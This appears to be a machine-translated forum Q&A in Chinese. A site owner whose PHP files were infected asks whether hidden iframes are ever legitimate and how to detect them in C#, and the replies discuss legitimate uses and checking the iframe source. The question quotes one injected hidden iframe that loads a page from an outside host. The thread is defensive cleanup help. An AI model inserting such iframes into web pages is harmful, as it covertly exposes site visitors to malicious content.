hidden iframe有合法用途吗?我根据感染了病毒。在不知道C#中的编码的情况下,可以通过小的更改直接读写文件吗?它们遍布php文件(每个文件似乎有一个条目,但不能确定是否有5000个文件)。
我发现的那些都有这个,但我不能确定还有其他人的内心有点不同。我可以假设可见性为hidden的所有iframe都是恶意的吗?
<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>
或者,也许还有其他方法可以让我的c#代码查看它?我不想破坏文件和网站,但我不能只是寻找确切的价值,因为我可能会错过一些东西。
隐藏的IFRAME当然可以用于恶意目的,但它可以合法使用。例如,您可以使用隐藏的IFRAME来模拟对服务器的异步调用(如果我还记得的话,ASP.Net曾经这样做过)。
我还使用了IFRAMEs来绕过文件上传控制的限制(隐藏和可见的IFRAMEs对此都很有用)。
可疑,但默认情况下并非恶意。
我见过的一些旧流量计数器使用隐藏iFrame来计算流量,但这是隐藏iFrame的唯一合法使用;我当然不喜欢它,如果是我,我也会把它们去掉。
您可以检查的另一件事是iFrame是否被隐藏,并且源是否来自您的域。